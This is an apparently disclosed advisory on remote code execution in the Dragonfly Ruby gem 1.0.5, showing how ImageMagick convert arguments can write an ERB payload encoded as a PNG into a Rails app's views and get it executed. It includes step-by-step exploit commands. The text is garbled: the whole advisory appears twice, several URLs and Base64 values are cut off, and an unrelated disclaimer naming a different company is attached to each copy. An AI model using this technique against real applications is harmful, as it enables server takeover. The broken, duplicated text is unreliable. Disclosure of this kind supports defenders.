RCE in the Dragonfly gem for image uploading & processing in
rails/sinatra, in version 1.0.5. (https://github.com/markevans/
The underlaying vulnerability is that you can pass arbitrary commands to
imagemagicks convert, thus granting arbitrary read/write for the
filesystem. Additionally the -process flag seems to be able to load
custom modules, which might result in execution of arbitrary files.
Here is a description of _one_ way of how to abuse the RCE vulnerability:
$cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$wc exploit.rb
3 13 63 exploit.rb
char length needs to be multiple of 3 (21x3 = 63) because every pixel in
a png
will contain 1 byte
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
test that everything went well:
$convert exploit.png test.rgb
diff should not show any diffs:
$diff -v test.rgb exploit.rb
upload the picture
copy the image url
eg:
http://domain.tld/media/
open pry or irb and run:
Base64.decode64
"
=>
"[[\"f\",\"2014/08/10/
Base64.strict_encode64
[[\"f\",\"2014/08/10/
rgb:/path/to/rails/app/views/
=>
"
go to your browser and request:
http://domain.tld/media/
and then: http://domain.tld/photos/
which will open app/views/photos/index.html.
terminal
you called rails server from.
Of course you can use different imagemagick flags than "write" to
achieve the same code execution. So this would really call for a
whitelist that restricts the commands that can be send to imagemagick.
The author was contacted and committed "fixes" (dragonfly version 1.0.6,
https://github.com/markevans/
The main fix seems to be "'rename dos_prevention' to 'verify urls
(recommended)'". Needless to say, many websites out there will still
disable the verification for ease of deployment of e.g. javascript that
requests thumbnail versions of images. Note that this vulnerability is
still exploitable if the attacker is unable to upload images, by using
the generators to "draw" arbitrary images by imagemagick commands.
cheers,
coco & leex
leex@room.me
http://hexgolems.com/fd/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
rails/sinatra, in version 1.0.5. (https://github.com/markevans/
The underlaying vulnerability is that you can pass arbitrary commands to
imagemagicks convert, thus granting arbitrary read/write for the
filesystem. Additionally the -process flag seems to be able to load
custom modules, which might result in execution of arbitrary files.
Here is a description of _one_ way of how to abuse the RCE vulnerability:
$cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$wc exploit.rb
3 13 63 exploit.rb
char length needs to be multiple of 3 (21x3 = 63) because every pixel in
a png
will contain 1 byte
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
test that everything went well:
$convert exploit.png test.rgb
diff should not show any diffs:
$diff -v test.rgb exploit.rb
upload the picture
copy the image url
eg:
http://domain.tld/media/
open pry or irb and run:
Base64.decode64
"
=>
"[[\"f\",\"2014/08/10/
Base64.strict_encode64
[[\"f\",\"2014/08/10/
rgb:/path/to/rails/app/views/
=>
"
go to your browser and request:
http://domain.tld/media/
and then: http://domain.tld/photos/
which will open app/views/photos/index.html.
terminal
you called rails server from.
Of course you can use different imagemagick flags than "write" to
achieve the same code execution. So this would really call for a
whitelist that restricts the commands that can be send to imagemagick.
The author was contacted and committed "fixes" (dragonfly version 1.0.6,
https://github.com/markevans/
The main fix seems to be "'rename dos_prevention' to 'verify urls
(recommended)'". Needless to say, many websites out there will still
disable the verification for ease of deployment of e.g. javascript that
requests thumbnail versions of images. Note that this vulnerability is
still exploitable if the attacker is unable to upload images, by using
the generators to "draw" arbitrary images by imagemagick commands.
cheers,
coco & leex
leex@room.me
http://hexgolems.com/fd/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information